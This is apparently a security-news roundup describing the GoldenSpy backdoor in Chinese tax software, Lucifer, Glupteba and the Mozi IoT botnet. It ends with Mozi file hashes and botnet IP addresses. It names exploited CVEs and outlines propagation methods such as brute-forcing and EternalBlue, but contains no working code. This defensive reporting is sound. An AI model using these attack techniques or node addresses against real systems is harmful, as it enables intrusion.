Chinese GoldenSpy… Making countries to run…

Chinese bank forced western companies to install malware-laced tax software
GoldenSpy backdoor trojan found in a Chinese bank’s official tax software, which the bank has been forcing western companies to install.

A Chinese bank has forced at least two western companies to install malware-laced tax software on their systems, cyber-security firm Trustwave said in a report published today.

The two companies are a UK-based technology/software vendor and a major financial institution, both of which had recently opened offices in China.

“They informed us that upon opening operations in China, their local Chinese bank required that they install a software package called Intelligent Tax produced by the Golden Tax Department of Aisino Corporation, for paying local taxes.”

The “GoldenSpy” backdoor
Trustwave, who was providing cyber-security services for the UK software vendor, said it identified the malware after observing suspicious network requests originating its customer’s network.

This backdoor,GoldenSpy and said it ran with SYSTEM-level access, allowed a remote attacker to connect to the infected system and run Windows commands, or upload and install other software.

But many types of software have remote-access features for debugging services. However, Trustwave said it also identified features that are more commonly found in malware and don’t have legitimate uses anywhere else.

GoldenSpy installs two identical versions of itself, both as persistent autostart services. If either stops running, it will respawn its counterpart. .

GoldenSpy operates with SYSTEM level privileges, making it highly dangerous and capable of executing any software on the system. This includes additional malware or Windows administrative tools to conduct reconnaissance, create new users, escalate privileges, etc.


But despite spotting the hidden backdoor inside the Aisino Intelligent Tax Software, Trustwave wasn’t able to determine how it got there.

Trustwave said it wasn’t able to determine if the backdoor was developed by China’s government hackers, secretly added by one of the bank’s rogue employees, or created by someone at Aisino Corporation.

It was also unclear if Chinese intelligence might have forced the bank or the Aisino Corporation into adding the malware to their official software so they could spy on a foreign company, or if this was an incident where hackers were purely interested into their own financial gain.

But while some questions remain unanswered, in the meantime, Trustwave is sounding the alarm for any other company doing business in China that has installed the same software.

Lucifer Malware Propels

A new devilish malware is targeting Windows systems with cryptojacking and DDoS capabilities.

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.

Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms.

The vulnerabilities targeted by Lucifer include Rejetto HTTP File Server (CVE-2014-6287), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), Laravel framework CVE-2019-9081), and Microsoft Windows (CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464).

After successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP DoS attack. Other commands allow the malware to drop an XMRig miner and launch cryptojacking attacks, as well as collecting interface info and sending the miner status to the C2.

The malware is also capable of self-propagation through various methods.

It scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42’s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the EternalBlue, EternalRomance, and DoublePulsar exploits.

Once these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.

Glupteba .. Mining Malware

Glupteba creates a backdoor into infected Windows systems – and researchers think it’ll be offered to cyber criminals as an easy means of distributing other malware.

A malware campaign that creates a backdoor providing full access to compromised Windows PC, while adding them to a growing botnet, has developed some unusual measures for staying undetected.

Glupteba first emerged in 2018 and started by gradually dropping more components into place on infected machines in its bid to create a backdoor to the system.

Highly self-defending malware with the cyber-criminal group behind it paying special attention to “enhancing features that enable the malware to evade detection.

Method of distribution is relatively simple: it’s bundled in pirated software, including cracked versions of commercial applications, as well as illegal video game downloads. The idea is simply to get as many users to download compromised applications that contain the Glupteba payload as possible.

To ensure the best possible chance of a successful compromise, the malware is gradually dropped, bit-by-bit onto the system to avoid detection by any anti-virus software the user may have installed. The malware also uses the EternalBlue SMB vulnerability to help it secretly spread across networks.

Glupteba uses a number of software exploits is for privilege escalation, primarily so it can install a kernel driver the bot uses as a rootkit, and make other changes that weaken the security posture of an infected host.

Glupteba’s latest campaign is described as relatively prolific, fitting in with what appears to be the aim of compromising as many computers as possible.

Glupteba’s main activity appears to be cryptocurrency mining. But the way it creates a backdoor into compromised computers, combined with the way in which those behind it look to be attempting to create a large botnet of readily available machines, suggests that the ultimate aim is to lease it out as a means of distributing other forms of malware to victims.

The campaign is still active and attempting to recruit more machines into the botnet. The simplest way users can avoid falling victim to Glupteba is by ensuring the critical security update issued to protect against EternalBlue is installed.

Microsoft released the patch in 2017, but EternalBlue remains successful because of the significant number of Microsoft Windows systems around the world that haven’t had it installed, putting them at risk of falling victim to this and other malware.

The normal general precautions apply here as much as anywhere else: Don’t run stuff you shouldn’t, keep everything patched, and always make sure you have some sort of malware protection on your computer . Don’t download and run unauthorised softwares

Mozi bot… Tricking IOT devices

The explosion of Internet of Things devices has long served as a breeding ground for malware distribution.

The explosion of Internet of Things (IoT) devices has long served as a breeding ground for malware distribution. The inability for users to patch many IoT devices has only compounded this problem, as bad actors continue to evolve tactics to leverage botnets for DDoS attacks and other malicious behaviour. Black Lotus Labs tracks malware families that present new or distinct threats to the global community, and recently began tracking a new malware family called Mozi.

Mozi is evolved from the source code of several known malware families – Gafgyt, Mirai and IoT Reaper – that have been brought together to form a peer-to-peer (P2P) botnet capable of DDoS attacks, data exfiltration and command or payload execution. The malware targets IoT devices, predominantly routers and DVRs that are either unpatched or have weak telnet passwords. After a notable traffic increase in December was mistakenly attributed to other malware families by researchers, Black Lotus Labs reviewed entries in our reputation system for that timeframe, which revealed a different story. This traffic was not simply increased activity by a known family, but a new family altogether.

Black Lotus labs findings

This malware family has not changed in some time, the increase was unexpected, and led to further investigation of the increase. Upon review of these entries we began to see a pattern develop, each host had an http server listening on a random port that served a file which included “Mozi” in the name. File names such as “Mozi.m” and “Mozi.a” were seen throughout all of the identified hosts.

The Mozi botnet is comprised of nodes that utilise a distributed hash table (DHT) for communication, similar to the code used by IoT Reaper and Hajime. These nodes also host the Mozi.m and Mozi.a malware binary files, passed during the compromise of new hosts, on a randomly chosen port. The standard DHT protocol is commonly used to store node contact information for torrent and other P2P clients. Using DHT allows the malware to bypass the use of standard malware command and control servers while hiding behind the large amount of typical DHT traffic. This makes it harder to track and impact the control infrastructure. As a P2P botnet, Mozi implements its own custom extended DHT described later.

To enumerate the botnet, Black Lotus Labs implemented a machine learning model trained on the observed unique DHT traffic implementation utilised by Mozi. This allows us to distinguish between Mozi nodes and benign hosts, and identify the IPs suspected of participating in the botnet. When we identify a new suspected Mozi node, our software attempts to confirm the suspicion by sending messages proprietary to the malware’s p2p protocol, and looks for correctly formatted responses. When the correct response is seen, the host is validated as a member of the Mozi botnet.

A deeper look into the Mozi malware
The Mozi samples analysed are ELF binaries with versions targeted for MIPS and ARM processor architectures. Once executed, the binary forks many versions of itself renamed as ‘ssh’ or ‘dropbear’. The forked processes are responsible for setting up the DHT communications and closing ports to prevent infection by other malware. The forked processes can also set up HTTP on a randomly chosen port to host the Mozi binary.

Mozi uses a modified DHT protocol for communication. The bot initially DHT pings several nodes hardcoded in the binary to bootstrap the initial connection to the DHT network. For the nodes that respond, the bot then sends a DHT ‘find_node’ command to locate other bots on the Mozi botnet. It often takes several find_node attempts to locate an active Mozi peer.

All the vulnerabilities targeted by the botnet are well known and are prevented by either proper patching or proper password management. Companies and individuals can follow these security best practices to help prevent these types of compromises in the future:

IOC’s

006965027c1f636295b5011a46905121

1bd4f62fdad18b0c140dce9ad750f6de

2560a86361257837b78d7ba289a031fb

2d2ffa0422db66640561c46b8e428267

2f8d6c0c6a449f3c074cfc0d6c8dbfc6

300f850c0186077550830fa35edddc4e

39434e0d800b62a72e8dfa202e2da9cd

3a103ab0da4d13ccc9ed2d612de71441

4dde761681684d7edad4e5e1ffdb940b

5b9b2a796c88da82d75553c48488b63f

635d926cace851bef7df910d8cb5f647

649e482199c9eb826fa0fca7016c325d

68bf06fb2a8cef72a61b01dcd10fd10d

6aa92a03083a19783ddf4e4913c230d3

781228e0a889c0624a5f1d8e9f5b0b30

849b165f28ae8b1cebe0c7430f44aff3

868180d3f78ae330c8ab4e6c20045930

8bfbda4203cfb4bb7aaeafe7afe9748a

8d207e2b6d13ebd5fc4430ef3670558f

8e81f08432ba7d64c67032a2a5580a48

92defd440acfd41595ce20c9107c3262

93be88ab0908a9359d7e5472ace22fe5

9a111588a7db15b796421bd13a949cd4

9c6539c9f5b3e831d5bcb1357d51d049

b08d4099b14e37ceda1923681a2f70f2

c16feda9ad177c8f7e6a07f57d84851f

c46327a65a1f9bf9c367fbda95f1bd22

c89a06d5b3a55a45b7d508e6b9152aa8

d107c5dc752cd262cd4d6c461c8583c4

d2b8a429bcf9e0eca54939e2cd4408dc

d71d01d469414e992ded9038ea761564

d96bbc2b1e5cc6b085bf04a8e487632e

dd4b6f3216709e193ed9f06c37bcc389

eda730498b3d0a97066807a2d98909f3

Top talking botnet nodes from most recent data

177.128.34.146

122.165.131.7

80.92.189.5

78.187.20.244

85.105.104.74

94.156.57.84

112.196.16.26

185.101.27.48

82.209.9.181

187.85.255.194

103.123.46.51

213.174.31.77

103.97.244.22

103.41.56.62

187.85.248.209

103.59.134.156

88.247.16.223

89.160.95.67